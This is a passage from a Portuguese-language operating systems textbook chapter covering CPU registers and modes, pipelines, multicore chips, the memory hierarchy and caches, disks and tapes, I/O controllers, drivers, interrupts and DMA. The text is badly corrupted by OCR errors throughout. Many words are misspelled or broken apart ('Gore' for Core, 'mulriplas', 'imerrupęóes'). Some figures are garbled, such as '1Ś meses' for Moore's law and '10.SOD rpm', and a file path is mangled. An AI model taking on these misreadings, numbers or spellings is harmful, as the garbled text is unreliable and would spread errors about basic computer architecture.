tem urna estrutura para cada rotina chama da, mas quc ain¬ 
da nao enccnoiL Unia estrutura dc pilha da rotina contem 
os parametros de entrada, as variavcis locais c as variavcis 
temporarias que nao sao mamidas nos registradores, 

Omro registrador especial e a PSW (program status 
woni — palavra de estado do programa). Esse registra¬ 
dor contem os bits do código de condiędes, os quais sao 
a Ile rad os petas insiruęoes dc comparaęao, pclo nivel de 
prioridade da CPU, pelo modo dc execuęao (imtario ou 
nudco) c por varios outros bits de controle, Programas dc 
usuarios normalmentc podem ler toda a PSW, mas em ge- 
ral sao capazes dc alterar somente alguns de sens campus. 
A PSW desempenha um papci importante nas chamadas 
de sistema e em E/S, 

O sistema operaciona! deve estar 'cienie' de todos os 
rcgistradorcs. Quando o sistema operacional compariillia o 
tempo da CPU, ele rnuitas vezes imerrompe a execuęao de 
lim programa e (re)inicia outro. Toda yez que ele faz isso, 
o sistema operacional precisa salvar todos os regisiradores 
para que eles possam ser restaurados ąuando o programa 
for exeaitado novamente. 


Para melhorar o desempenho, os projetisias de CPU 
abandonaram o modelo simples de busca, decodlfieaęaa e 
execuęao de uma msiraęao por vez. Muitas CPUs moder- 
nas tern recursos para executar mais de uma instruęao ao 
mesmo tempo. Por exemplo, uma CPU pode ter unidades 
separadas de busca, dc cod i fi ca ęa o c cxccuęao, dc modo 
quc, enąuanto ela estivcr cxccutando a instruęao n, da 
tambem pode estar decodificando a instruęao n + I e bus- 
cando a instruęao n + 2. Hssa organizaęao e denominada 
pipeline c esta ilustrada na Figura 1.7(a) para um pipeline 
com tres estagios. Pipelines mais longos sao comims. Na 
maioria dos projetos de pipelines, uma vez que a instruęao 
tenha sido trazida para o pipeline, eia deve ser executada, 
mesmo que a instruęao precedente tenha constituido um 
desvio condidonal satisfeito. Os pipelines causam grandes 
dores de cabcęa aos projetistas dc compiladores e dc siste- 
mas operacionais, pois cxpoem diretamente as complcxi- 
dades subjaccntes a maquina. 

Ainda mais avanęado que um processador pipeli¬ 
ne e um processador superescalar, mostrado na Figura 
L7(b}. Esse lipo de processador possui mulriplas unidades 
de execuęao, por exemplo, uma unidade para aritmetica dc 
ntimeros inteiros, uma unidade aritmetica para ponto fiu- 
tuantc c outra unidade para operaęóes booleanas, A cada 
vcz, duas ou mais insiruęoes sao buscadas, dećodificadas 
e armazenadas temporariamente em um buffer de instru- 
ęoes ale que possam ser execuiadas. Tao logo uma uni¬ 
dade de execuęao esteja livre # o processador vai yerilicar 
se ha alguma instruęao que possa ser executada e, se for 
esse o caso, removera a instruęao do buffer de insiruęoes 
e a executara. Uma impłicaęao disso e qtie as instruęóes 
do programa muitas vezes sao executadas fora de ordę nu 
Normalnienie, cabe ao hardware assegurar que o resul- 
tado produzido seja o mesmo de uma implcmcntaęao se- 
qucndal, mas ainda permanece uma grandę ąuantidadc 
de problem as complexos a serem resolvidos pelo sistema 
operacional, 



fa) 



I Figura 1,7 (a) Um processador com pipeline de tres 
estagios. (b) Uma CPU superescalar. 
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A maioria das CPUs — exceto aquelas miii to simples 
usadas em sistemas embarcados — apresenta dois modos 
dc fuocionamento: o modo nudeo e o modo usuario, 
eon formę mend ona do anteriormente. Em geraL o modo 
dc fundonamento ć controlado por um bit do registrador 
PS W, Exccutando cm modo nudeo, a CPU pode executar 
quaiquer instruęao dc seu conjunto dc instruęoes c usar 
cada atributo de set: hardware, fi o caso do sistema ope- 
radonal; de e executado em modo nudeo e tern acesso a 
todo o hardware. 

Por omro lado, programas de usunrios sao executados 
cm modo usuario, o quc permirc a execuęao dc apenas um 
subconjunto das instruęoes e o accsso a apenas um subcoii- 
junto dos atributos. De modo geraL todas as instruęoes quc 
envolvem E/S e protcęao de memória sao inaccssfveis no 
modo usuario, Alierar o bit de modo no registrador PS W 
para modo nudeo e tambem, nauiralmeme, vedado. 

Para obter scmęos do sistema opera ci on a L um pro- 
grama de usuario deve fazer urna chamada de sistema, 
quc, por meio dc uma instruęao TRAP. chaveia do modo 
usuario para o modo nudeo e passa o controle para o siste¬ 
ma operadonal. Quando o iraballio do sistema operadonal 
esta termmado, o controle e ret oma do para o próg rama do 
usuario na instruęao seguinte a da chamada de sistema. 
Adiante, neste mesmo capitulo, explicarcmos os detalhes 
do processo dc chamada de sistema, mas, por enąuanto, 
pense nek como um lipo especial de proce di mento de 
instruęao de chamada que tern a propriedade adicional de 
chavcar do modo usuario para o modo nudeo. Um aviso 
sobre a lipografia: u sa rem os letras mintisculas com fonte 
Helvelica para indicar chama das de sistema no decorrer do 
texto, como, porexemplo, read. 

E bom observar que, para fazer uma chamada de sis¬ 
tema, ha, alern das instmędes lipo TRAP, as armadilhas de 
hardware. Armadilhas de hardware advertem sobre uma 
situaęao exccpcionaL como a iemativa dc dmilir por 0 ou 
um underflow (Incapaddadc dc represenlaęao de um nu- 
mero muito peąueno) cm porto llutuante, Em todos esses 
ca sos, o sistema operadonal assume o controle e decide o 
que fazer. Aigumas vezes o prograrna prccisa ser Eechado 
por causa dc um erro. Outras vczcs, o erro pode ser ignora- 
do (a u m nu mero com underflow pode-se airibuir o valor 
0). Por firn, ąuando o prograrna avisa previamente quc quer 
trata r certos tipos de próbie mas, o controle pode ser passado 
de volta ao prograrna para deixado iratar o problema. 

Chips multithread e multinucleo 

A lei de Moore a firma que o nu mero de transistores 
de um chip dobra a cada IŚ meses. Essa 'lei' nao e um lipo 
de lei da ffsica, como a conservaęao do momento, mas e 
uma observaęao do cofumfador da Intel, Gordon Moore, 
sobre a rapidez com que os engenheiros de processo das 
companhias de seinicondmores sao capazes de comprimir 
scus transistores. A lei de Moore foi valida por irćs decadas 
c espcra-sc quc o seja por pclo menos mais uma decada. 


A abimdancia de transistores esta levando a um pro¬ 
blema: o que fazer com todos eles? Vimos uma abordagem 
anteriormente: arquiteturas superescalares, com unidades 
funcionais multiplas. Mas, a medida quc o mi mero de tran¬ 
sistores alimenta, ha mais possibi lida des ainda. Algo óbvio 
a fazer e colocar cachcs ma lor es no chip da CPU c, sem 
dirnda, isso esta aconteccndo mas, no firn, o ponto dc ren- 
dimentos dccrescenles sera alcanęado. 

O próximo passo e replicar nao apenas as unidades 
funcionais, mas tambem parte da lógica de controle. O 
Pentium 4 e alguns outros chips de CPU tern essa proprie- 
dadc, chamada multithreading ou hyperthreading (o 
nonie dado pcla Intel), Para uma primdra aproximaęao, 
o que da faz ć permitir quc a CPU mantenha o estado dc 
dois threads diferenles e faęa em seguida o chaveamento 
para tras e para adiame em uma escala de tempo de na- 
nossegundos, (Um thread e um tipo de processo leve, que, 
por sua vez, e um prograrna de execuęao; nós o aiialisare- 
inos em detalhes no Capitulo 2.) Por exemp!o, se um dos 
processos precisa ler uma palavra a pariir da memória (o 
que leva muitos ciclos de relógio), uma CPU multithread 
pode fazer o chaveamento para omro thread, O multi¬ 
threading nao ofcrccc paralclismo rcal. Apenas um pro¬ 
cesso por vcz ć cxecutado, mas o tempo dc cha vc a men to ć 
reduzido para a ordcm dc um nanossegundo. 

O multithreading tern implicaęoes para o sistema opera- 
cional porque cada thread aparece para o sistema operacio- 
nal como uma CPU. Considere um sistema com duas CPUs 
efetivas, cada uma com dois threads. O sistema operadonal 
vcra quatro CPUs. Sc houvcr trabalho sufidente para man¬ 
ier apenas duas CPUs ocupadas cm dado momento, dc 
pode escalonar inadvertidamcntc dois threads na mesma 
CPU, deixandoa mitra completamcnte ociosa. Essa escolha 
ć muito menos efkiente do que usar um thread em cada 
CPU, O sucessor do Pentiiim 4, a arquitetura Gore (tambem 
o Core 2), nao tern hyperthreading, mas a Intel ammciou 
que o sticessor do Core tera essa propriedade novameme. 

Al cm do multithreading, temos chips dc CPU com dois 
ou quatro ou mais processadores completos ou nucleos^ 
Os chips multinudeo da Figura 1.8 irazem, de falo, ąuatro 



I Figura 1.8 (a) Chip QE.md-core com uma cache l_2 
com partii hada. (b) Um chip quad-core com caches L2 
separadas. 
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minichips, cada umcomuma CPU independenta. (As caches 
serao explicadas a seguir.) A utilizaęao de tais chips multinu- 
deo reqner nm sistema operacional para mulliprocessadores. 

_ 1.5.21 Memória 

O segundo principal componente em quaiquer com- 
putador e a mcjnóńa. Idealmente, uma memória deveria 
ser basta me rapida (mais veloz do que a exccuęao de uma 
instruęao, para que a CPU nao fosse a i rasa da pela memó¬ 
ria}, alem de muito grandę c ba rata. Ncnhmna tecnologia 
atual alinge todos esses objęli vos c, assim, uma abordagcm 
difereme tem skio adoiada, ou seja, consiruir o sistema 
dc memória como uma liierarąuia de camadas, eon formę 
m ostra a Figura 1.9. A camada superior tem maior vdoci- 
dade, me nor capacidade e maior custo por bit que as ca ma¬ 
il as inferiores, freąuentememe com uma difcrenęa de urn 
bilhao ou mais. 

A camada superior comistc nos registradores intemos 
ci CPU, Eles sao leitos com o rnesmo materiał da CPU e sao, 
poi tanio, tao rapidos ąuanto cl a. Conseąucmemente, nao 
ha atraso em sen acesso. A capacidade de memória dispo- 
nfvel neles em geral e de 32 x 32 bils para uma CPU de 32 
bits e de 64 * 64 bits para uma CPU dc 64 bits. Ou seja, 
men os de 1 KB em ambos os casos. Os pi ogra mas devem 
gereneiar os registradores (isio e, decidtr o que colocar ne- 
ies) porst mesmos, no software. 

Nessa liierarąuia do sistema de memória, ahaixo da 
camada de registradores, vem outra camada, denomina¬ 
da memória cache, que e controlada principalmente pelo 
hardware. A memória principal e dmdida cm linhas de 
cache {cache lines), normalmente com 64 bytes cada uma. 
A lin ha 0 consiste nos endereęos dc 0 a 63, a lin ha 1 eon- 
sisLe nos endereęos cnire 64 e 127, e assim por dianie. As 
linhas da cache mais frequenlcmente usadas sao mamidas 
em uma cache de aha velocidade, localizada detnro ou 
muito próxima a CPU. Quando o pro gra ma predsa ler uma 
palavra de memória, o hardware da memória cache veri- 
fka se a lin ha necessaria esta na cache, Se a linha requi- 
sitada estiver presenie na cache (cache hit), a reąuisięao 
sera atendida pela cache c nenhuma reąuisięao adicional e 
enviada a memória principal por meio do barramemo. A 
busca na cache ąuando a linha solicitada esta presenie dura 


normalmente em toino de dois ciclos de CPU. Se a linha 
reąuisitada esliver ausente da cache (cache miss), uma re- 
ąuisięao adicional sera enviada a memória principal, com 
uma subsiancial penalidade de tempo. A memória cache 
tem tamanho limitado por causa de seu alto custo, Algu- 
mas ma qu i nas tem dois ou atć tres mvds de cache, cada 
um mais lento e de maior capacidade que o antenor. 

O conceito de caching desempenha um papel imponan- 
te em muitas areas da ciencia da computaęao, nao apenas 
em colocar linhas da RAM no cache. Sempre que houver um 
rcciirso grandę qne possa ser dividido em partes, alguns dos 
quais sao muito mais utilizados quc outros, caching e muitas 
vczcs utilizado para apcrfcięoar o desempenho. Os sistemas 
operadonais o utilizam o tempo todo. Por excmplo, a maio- 
ria dos sistemas operadonais mantem (partes de) arquivos 
muito utilizados na memória principal para lentar evitar 
busca-Ios no disco repetidamente. De modo semelhame, os 
resultados da conversao de nomes de rola tongos como 

/kóme/a$t/project$/fflinix3hrdkernd/chck, c 

no endereęo de disco on de o arquivo esta localizado podem 
ser registrados em caclic para cvitar repetir buscas. Por firn, 
ąuando um endereęo de uma pagina da Web (URL) e eon- 
veriido em um endereęo de rede (endereęo fP), o resultado 
pode ser armazenado para uso futuro. Ha muitos outros 
u sos. 

Em qualquer sistema cache, muitas pergumas surgem 
rapida menie, incluindo: 

1 1 Quando colocar um novo item no cache. 

2. Em qual linha de cache colocar o novo iłem. 

3. Que item remover da caclic ąuando for prcciso 
espaęo* 

4. Ondc colocar um item rcccntcmcntc dcsalojado na 
memória mais ampla. 

Nem loda perguiua e reievante para cada silu aęa o de 
cache. Para linhas de cache da memória principal na cache 
da CPU, geralnimte um novo item sera inserido em cada 
ausencia de cache. A linha de cache a ser usada em geral e 
calatlada u s and o alguns dos bits de a! ta ordem do endereęo 
de memória menrionado. Por exempIo, com 4,096 linhas de 
cache de 64 bytes e endereęos 32 bits, os bits 6 a 17 podem 
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I Figura 1.9 Hierarquia de mennória tipica. Os nómeros s&o aproxinnaę69S, 
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ser usados para especificar a linha de cache, com os bits de 
0 a 5 especificando os bytes dentro da linha de cache. Nesse 
caso, o iłem a ser rei no vi do e o mesmo cle quando novo$ 
dados sao inseritios, mas cm oułros sistemas potkną ser di- 
lercntc. Por lim, ąuando urna linha dc cachc c recscrita para 
a memória prindpal (sc iiver sido modificada desde quc fol 
colo ca da em cache}, o lugar na memória para reescreve-la 
e determmado exdusivameme pelo endereęo em questao. 

As cachcs sao u ma idcia tao boa quc as CPUs modernas 
tern duas dclas. 0 primeiro nfvel r ou cache LI, esta sempre 
dentro da CPU e normalmente alimenta instrtiędes deco- 
difkadas no mecanismo de execuęao da CPU* A maioria 
dos chips tern urna segunda cache Ll para palavras de da¬ 
dos nmito utilizadas. As caches U geralmente tern 16 KB 
ca da. Alem disso, sempre ha urna segunda cachc, chamada 
cache L2, que armazena varios megabytes de palavras de 
memória usadas recentemente. A difercnęa entre caches 
Ll c L2 esta na sincromzaęao. O accsso a cache LI e feito 
sem neniium retardo, ao passo que o accsso a cache L2 en- 
vo!vc um reiardo dc um ou dois ciclos de relógio. 

Tratando-se de chips multinueleo, os projetistas tem de 
decidir onde colocar as caches. Na Figura I.8(a), ha urna 
unica cache L2 compartilhada por todos os nudeos. Essa 
a hord a gem e tisada em chips multinueleo Intel Em con- 
traposięao, na Figura l.S(b), cada ntkleo tein sua própria 
cache L2. Essa abordagem ć us a da pcla AMD. Cada estrate- 
gia tem aspeclos favoraveis e desfavoraveis. Por exetnplo, 
a cache L2 compartilhada da Intel requer um controlador 
de cache mais complicado, mas o metodo da AMD dilkulta 
manier a consistenria entre as caches L2. 

A memória prindpal e a ca mada seguinte na hi-erar- 
quia da Figura 1.9* fi a locomotiva do sistema de memó¬ 
ria. A memória prindpal e muitas vezes chamada de RAM 
{random access memory — memória dc acesso aieatório). 
Antigamente era chamada dc memória de nudeos (core 
memory) porque a memória dos computadores dos a nos 
1950 e 1960 era constitufda de pequenos nudeos de ferrite 
magnetizavris, Hoje em dia, as memórias tem de centenas 
de megabytes a varios giga bytes e continuam crescendo ra- 
pidameme. Todas as requisięoes da CPU que nao padem ser 
atendidas pela cache vao para a memória prindpal. 

Al cm da memória prindpal, muitos computadores 
apresemam unia peqticna memória de acesso aieatório 
nao volaiil Ao contrario da RAM comuni, a memória nao 
Yolatil nao perde seu contetido quando sua alimeotaęao e 
desligada* Por exemplo, a ROM (read only memory — me¬ 
mória apenas de leitura) ć programada na fabrica e nao 
pode ser a heroda. E rapida c barata. Em alguns computa¬ 
dores, o carregador (bootstmp ha der), usado para inidalizar 
o computador, esta gravado em ROM, Algumas placas de 
E/S tambem vem com programas em ROM para controle 
de dispo$itivos em bako mvcL 

A EEPRGM (dectńcally erasabk ROM — ROM detrica- 
nienic apagayd) c a flash RAM tambem sao memórias dc 


acesso aieatório nao volateis, mas diferentes da ROM, pois 
podem ser apagadas e reescritas. Com udo, escrever nelas 
Icva varias vezes mais tempo quc escrever em urna RAM. 
Desse modo, sao usadas como as ROMs comuns, só que 
com a caractertstica adidonal de possibilitar corrcęao dc er- 
ros em programas por mcio da regravaęao. 

A memória flash tambem e normalmente usaila como 
mcio de armazena men to em dispositivos el et roni cos porta - 
teis. Atua como o filme cm cameras digttais e como o disco 
em reprodtnores de muska portateis. Essa memória tem 
velocidade imermediaria entre as da memória RAM c dc 
disco. Alem do mais, diferentemente da memória dc disco, 
sc for apagada muitas vczcs, cla sc dcsgasta. 

Existemainda memórias Yolateisemtecnologia CMOS. 
Muitos computadores usam memórias CMOS para man¬ 
ier data e hora atualizadas* A memória CMOS e o Uran¬ 
io dc relógio que inerementa o tempo registrado nda sao 
alimentados por urna pcquena bateria, para que o tempo 
seja corrctamcntc atualizado, mesmo quc o computador seja 
desligado. A memória CMOS tambem pode conter os para¬ 
metrem dc configuraęao, como dc qual disco dcvc sc i nicią- 
lizara carga do sistema {boot), A tecnologia CMOS e usada 
porąue conscme bem menos energia, e, assim, as baterias 
originats instaladas na fabrica podem durar varios anos. 
Com u do, q uan do a bateria comeęa a falhar, o computador 
pode parecer um portador da doenęa de Alzheimer, esquc- 
cendo coisas que sabia havia anos, como, por exemplo, de 
qual disco rigido carregar o sistema operadonal. 


1.3.51 Discos 


A caniada seguinte nessa liierarąuia e constituida 
pelo disco magnet ico (disco rigido). O armazena niemo 
cm disco c duas ordens de magnitude mais ba rato, por bit, 
que o da RAM e, muitas vezcs, duas ordens dc magnitude 
maior tambem. O u ni co problema e quc o tempo dc aces¬ 
so aieatório aos dados e cerat de tres ordens dc magnitude 
mais lento. Essa baka yelocidadc e ca usada pelo fato dc 
o disco ser um dispositivo mecanico, couforme i lustra a 
Figura MO* 
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I Figura 1.10 Estru tura de urna unidade de disco. 
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Um disco magnet Leo consiste ein urn ou mais pratos 
inetalicos que rodam a 5.400, 7.200 ou 10.SOD rpm. Um 
braęo mccanico move-se sobre esses pratos a partir da late- 
ral, como um braęo dc toca-discos dc um vdho fonograf o 
dc 33 rpm tocando discos de vinil. A inforniaęao ć cscriia 
no disco cm u ma serie de cnculos eon cen tri cos. Em qual- 
quer posięao do braęo, ca da cabeęa pode ler urna regiao 
drcular chamada de trilha. Juntas, todas as trilhas de urna 
dada posięao do braęo for mam um cilindro. 

Ca da trilha c dividida cm um ceno nu mero dc setores. 
Gada setor tem normaimemc 512 bytes. Nos discos atuais, 
os eilindros mais exteriores contem mais setores quc os 
mais intertores. Mover o braęo de um cilindro para o pró¬ 
chno leva em lotno de 1 ins, Move-lo diretamente ate um 
cilindro qualquer leva em geral de 5 a 10 ms, dependendo 
do dispositivo adonador. Urna vez com o braęo na trilha 
correta, o adonador do disco deve esperar atć que o setor 
desejado cheguc abaixo da cabcęa — um atraso adidonal 
dc 5 a 10 ms, dependendo da vclocidade de rotaęao (rpm) 
do disposiiivo adonador. Unia vez que o setor esteja sob a 
cabcęa; a Icitura ou a escrila ocorre a u ma taxa de 50 MB/s 
em discos de baixo desempenho ou ate 160 MB/s em discos 
mais rapidos* 

Muitos computadores mantem um esąnema conhecb 
do como memória virtua( H que discutircmos em maiores 
detalhes no Capitulo 3. Esse esąuema possibilita executar 
programas maiores quc a memória lisica colocando-os cm 
disco c usando a memória prmripal como um tipo de ca- 
che para as part es mais executadas. Esse esquema requer o 
mapeamento de endereęos de memória rap i da men te para 
coiwerter o endereęo que o programą gerou no ertdereęo 
Esico em RAM on de a palavra esta localizada, Esse mapea- 
mento e realizado por unia parte da CPU chamada unida* 
de de gerenciamento de memória {memory management 
unit — MMU), como most rado na Figura 1.6. 

A presenęa da eachc e da MMU pode ter um impacto 
importame sobre o desempenho. Em um sistema de mulii- 
programaęao, quando ha o chaveamento entre programas, 
muilas vezcs denominado chaveamento de contexto, 
pode ser necessario limpar da ca che todas os blocos modifi- 
cados c altcrar os registros dc mapeamento na MMU. Am- 
bas sao operaęoes caras c os programadores tentam cyka¬ 
łaś a Lodo custo. Vcrcmos algumas das implicaęoes dessas 
laticas posteriormente. 

1.3.41 Fitas 

A ultima camada da hierarąuia de memória e a fita 
magnetica. Esse meio e muito utilizado como cópia de 
segnranęa (backup) do armazenaniemo ein discos e para 
abrigar grand es ąuantidades dc dados. Para ter acesso a 
uma fita, cla prccisa ser colocada em unia unidade leitora 
dc fitas, manualmcnte ou com a aj uda de um robo (mani- 
puladores automaticos dc fitas magncticas sao eomuns em 
instalaęoes com grandes bancos dc dados). Entao a fita tera 


de ser percorrida seąuencialmente ate chegar ao bloco re- 
quisitado. No minimo, isso levaria alguns minutos. A gran¬ 
dę vantagem da lita magnetica e quc cla tern um custo por 
bit muito baixo e e tambem removiVd — urna caracteristi- 
ca importantc para fitas magncticas inilizadas como cópias 
dc segnranęa, as ąuais devem ser armazenadas distantes do 
local dc proce ssa men to, para quc estejam protegidas contra 
ineendios, immdaęoes, terremotos etc. 

A hierarquia de memória que temos discutido e o 
padrao mais comum, mas alguns sistemas nao tern todas 
cssas camadas ou algumas sao diferentes deias (como dis¬ 
cos ópłicos). No cntaim em todas, conforme sc desce na 
hicrarquia, o tempo dc acesso aleatório crcsce muito, a ca- 
pacidadc, da mes ma mancira, tambem alimenta basta me, 
e o custo por bil cai cnonnemente. Em visla disso, e bem 
provavel que as hierarąuias de memória ainda perdurem 
por varios a nos. 

1.3.51 Dispositivos de E/S 

A CPU e a memória nao sao os unicos recursos que 
o sistema operadonal tem de ge ren ci ar. Os dispositivos de 
E/S tambem imeragem imcnsWamentc com o sistema ope- 
radonal. Como se ve na Figura 1.6, os dispositivos de E/S 
sao constituidos, geralmcrue, de duas partes: o comrola- 
dore o disposilivo propriamenie dito. O controlador e um 
chip ou um conjumo de chips em uma płaca que contro la 
fisicamenie o dispositivo. Ele recebc comandos do sistema 
operadonal, por exemplo, para ler dados do dispositivo e 
para envia-los. 

Em muitos casos, o controle rcal do dispositivo ó bas- 
tantc com p li ca do c chciode detalhes. Dcsse modo, cabc ao 
controlador apresentar urna intcrface mais simplcs (mas 
ainda muito complcxa) para o sistema operadonal. Por 
exempIo, um controlador de disco, ao receber um coman- 
do para ler o setor 11.206 do disco 2, deve entao conver- 
ter esse numero lincar de setor em numeros de cilindro, 
setor e cabeęa. Essa conversao pode ser muito complexa, 
ja que os eilindros mais externos tem mais setores que 
os internos c que alguns setores danificados podem ter 
sido remapeados para outros. Entao, o controlador pre- 
cisa determinar sobre qual cilindro o braęo do adonador 
esta e emilir uma seąuencia de pulsos, correspondenie a 
distancta em numero de eilindros. Ele deve aguardar ate 
que o setor apropriado esteja sob a cabeęa e, entao, iniciar 
a Icitura e o armazenamento de bits conforme vierem, re- 
movendo o cabeęa lit o e verifkando a soma de verificaęao 
(chechum). Para realizar todo esse trabalho, em geral os 
controladores embutem peąuenos computadores progra- 
mados exclusivamenie para isso. 

A outra parte e o próprio dispositivo real. Os disposi- 
tivos possueni interfaces bastante simplcs porąue nao fa- 
zem nada muito diferentc, e isso ajuda a tornad os padro- 
nizados. Padroniza-los e necessario para quc, por exemplo, 
qualquer controlador dc discos IDE possa controlar qual- 
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quer disco JDE. IDE e a sigla para inUgrated drm ekctronics 
e e o tipo padrao de discos de muitos computadores. Como 
a interface com o dispositivo real esta oculta pelo controla- 
dor, tu do o que os sistemas opera cionais veem e a interfa¬ 
ce do controlador, quc pode ser muito diferente da interfa¬ 
ce para o dispositivo* 

U ma vez que cada tipo de controlador e diferente, di- 
ferentes programas sao necessarios para comrola-los. O 
pr ogra ma que se co mim i ca com urn controlador, em ii ind o 
comandos a ele e aceitando respostns, e denominado driver 
de dispositivo. Cada fabricante de controlador deve for- 
neccr urn drivcr espedfico para cada sistema operadonal a 
que da suporlc. Assim, um digitalizador dc imagcns (scan - 
ner) pode vir com drivers para Windows 2000, Windows 
XP, VisLa e Linux, porexcmplo. 

Para ser u sad o, o driver deve ser colocado dentro do sis¬ 
tema operadonal para que possa ser executado em modo 
nucleo. Na realidadc, os drlvcrs podem ser exeaitados fora 
do liiicleo, mas poucos sistemas operacionais atuais sao ca- 
paritados para cssa atividadc porquc, para isso, 6 ncccssario 
pennitir quc um driver no cspaęo do usuario tcnlia accsso 
ao dispositivo de maneira controlada, algo praticamcnte in- 
viavel. Ua tres mandras de colocar o driver dentro do mi- 
cleo. A primeira e religar o nucleo com o novo driver e, en¬ 
tao, reinicializar o sistema. Muitos sistemas UNIX funcionam 
dessa maneira. A segunda maneira e adicionar urna entrada 
a um arquivo do sistema operadonal informando que ele 
precisa do driver e, entao, reinidar o sistema. No momen- 
to da inicia Lizaęao, o sistema operacional busca e encontra 
os drivcrs dc que dc prccisa c os carrcga. O Windows, por 
cxcmplo r fundona assim. A teredra maneira c capacitar o 
sistema operadonal a aedtar novos drivers enąuanto csłi- 
vcr em execuęao e inslala-los sem a nccessidade de reini- 
cializan Esse modo ainda e raro, mas esta se tornando cada 
vez mais comum. Dispositivos acoplados a quente, como 
disposilivos USB e IEEE 1394 (que serao discutidos adian- 
te)„ predsam sempre de drivers earregados dinamicamente. 

Todo controlador tem um pcąueno mi mero dc regis- 
tradores usados na comunicaęao* Por excmplo, um con- 
trolador de discos deve ten no mmimo, registradores para 
espedficar endereęos do disco e de memória, contador de 
setores e indicador de direęao (leitura ou escrita). Para aii- 
var o controlador, o driver recebe urn comando do sistema 
operadonal e o iraduz em valores apropriados a serem es- 
critos nos registradores dos dispositivos. O grupo de todos 
esses registradores de dispositivos forma o espaęo de por¬ 
ta de E/S, um assuntoao qual retorna remos no Capituio 5. 

Em alguns computadores, os registradores dos dispo- 
sitivos sao mapeados no espaęo de endereęamento do sis¬ 
tema operadonal (os endereęos que ele pode usar). Assim, 
eles podem ser lidos e escritos como se fossem palavras da 
memória prindpal. Para esses computadores, nenhuma 
instruęao espedal de E/S e necessaria e os programas do 
usuario podem ser mantidos distantes do hardware dd- 


xando esses endereęos de memória fora de seu alcance 
(por exemplo, usando-se registradores-ba se e limite). Em 
outros computadores, os registradores de dispositivo sao 
colocados em um espaęo espedal de portas de E/S,, e cada 
registrador tern seu endereęo dc porta. Ncssas maąuinas, 
instruęoes cspcciais IN e OUT sao dispomvcis cm modo nu¬ 
cleo para quc se pennita quc os drivcrs leiam c escrcvam os 
registradores. O primeiro esąuema cli mina a nccessidade 
de instruęoes cspcciais de E/ś, mas eon sonie parte do espa¬ 
ęo de endereęamenio. O ultimo esquema nac gasta o espaęo 
de endereęamento, no entanto requer instruęoes especiais. 
Ambos sao ampla men te usados. 

A entrada e a saida podem ser realizadas dc tres ma¬ 
ndras diferentes. No metodo mais simplcs, um pi ogra ma 
de usuario emite unia chamada de sistema, a qual o nucleo 
trąd uz cm u ma chamada ao driver apropriado, O driver 
entao inicia a E/S e fEca em um laęo perguntantlo cominit- 
amente se o dispositivo terminou a operaęao de E/S (em 
geral ha um bit que i n dl ca se o dispositivo ainda esta ocu- 
pado). Quando a operaęao de E/S termina, o driver poe 
os dados onde eies sao necessarios (se houver) e retorna, 
O sistema operadonal entao remete o comrole para quem 
chamou. Esse metodo e chamado dc espera ocupada e 
tern a desvantagem dc mamci a CPU ocupada interrogando 
o dispositivo atć que a operaęao de E/S len ha terminado. 

No segundo metodo, o driver inida o dispositivo e pede 
a ele que o interrompa ąuando terminar. Dessa maneira, ele 
retorna o comrole da CPU ao sistema operadonal. O siste¬ 
ma operadonal entao bloqueia, se neccssario, o programa 
quc o chamou pedindo o scrvięo e procura outra tarcia para 
cxecutan Quando o controlador dctccta o finał da transfe- 
rencia, cle gera urna interrupęao para sinalizar o termino. 

InterrupęÓes sao muito importantes para os sistemas 
operacionais; por isso, vamos examinar essa ideia mais de 
perto. Na Figura 1.11 (a) vemos um processo de tres passos 
para E/S. No passo 1, o driver informa ao controlador, es- 
crcvendo em seus registradores de dispositivo F o quc devc 
ser fcito. O controlador entao inicia o dispositivo* Quan- 
do o controlador termina de transferir, ler ou escrcvcr o 
n ii mero dc byles pedido, de entao sinaliza isso, no passo 
2 t ao chip controlador dc interrupęao por meio dc certas 
linhas do barramento. Se o controlador de interrupęao es- 
tiver p repa rado para aedtar essa interrupęao (o que pode 
nao ocorrer se ele estiver ocupado com outra interrupęao 
de maior prioridade), ele sinaliza esse fato a CPU no passo 
3. No passo 4, o controlador de interrupęao poe o numero 
do dispositivo no barramento para quc a CPU o leia e saiba 
qual dispositivo acabou de terminar (muitos dispositivos 
podem estar exccutando ao mesmo tempo). 

Urna vez que a CPU tenha decidido aceitar a imer- 
rupęao, o contador de programa (PC) e a palavra de estado 
do programa (PSW) sao entao normalmente salvos na pi- 
Iha atual e a CPU e chaveada para modo nucleo. O numero 
do dispositivo pode ser usado como fndice para uma porte 
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Figura 1.11 (a) Passos ao inictalizar um dispositivo de E/S 
e obter u ma interrupęao. (bj 0 processamento da interrupęao 
envolve fazer a interrupęao, executar o manipulador de 
interrupęao e retornar ao próg rama de usuario. 


da mcmória denominada vetor de interrupęao, que con- 
tem o endcreęo do manipulador de interrupęao {inkrrupi 
handler) para esse dispositivo. Ao inicializar o 'manipulador 
de interrupęao' (o código faz parte do driver do dispositivo 
que esta mterrompendo), ele reniove o PC e a PS W da pi- 
Iha c os salva. Entao ele consulta o dispositivo para sabcr 
sua situaęao. Unia vez que o manipulador de interrupęao 
tenha terminado, ele ret orna para o programa do usuario 
que estava sendo executado — ret oma para a primeira ins¬ 
truęao que ainda nao lenlia sido executada. Esses passos 
sao mostrados na Figura 1.1 l(b}. 

0 terceiro metodo para impkmentar E/S utiliza um 
chip c spoci a I de acesso direto a mcmória (direct niemoty ac- 
cess — DMA), o qual controla o iluxo de bits entre a me- 
mória e algom controlador sem interveiięao eon stan te da 
CPU. A CPU configura o chip DMA, informando quantos 
bytes dcvem ser trans feridos, os cndereęos do dispositivo 
c de mcmória cnvolvidos c a direęao, e entao o deixa cxe- 
cutar* Quando o chip dc DMA fmalizar sua tarcia, causara 
u ma interrupęao, que ć tratada conformc dcscrilo anterior- 
mente, Os hardwares dc DMA c dc E/S cm gcral sera o dis- 
cutidos cm mais detalhes no Captlulo 5, 

As interrupęoes muitas vezcs podem acontecer em 
momentos totalmcntc incoiwcnicntes, por exemplo, en- 


quanto outro manipulador de interrupęao estiver em exe- 
cuęao. Por isso, a CPU tern urna maneira de desabtlitar as 
interrupęoes e, entao, reabilita-las depois. Enquanto as 
interrupęoes esiivercm desa bili ta das, todos os dispositivos 
que terminem su as atmdades continuam a emitir sinais 
dc interrupęao, mas a CPU nao c intcrrompida ate quc as 
imerrupęóes sejam habilitadas nova menie, Se varios dis- 
positivos [inalizam enąuanto as interrupęoes cstivcrcm 
desabilitadas, o controlador dc interrupęao dccidc qual in- 
terrupęao sera acatada primeiro, com base r normalnienie, 
em prioridades atribuidas estaticamente a cada dispositivo. 
O dbpositivo de maior prioridade vence. 

1.5.61 Barramentos 

A organizaęao da Figura Ló foi utilizada cm minicom- 
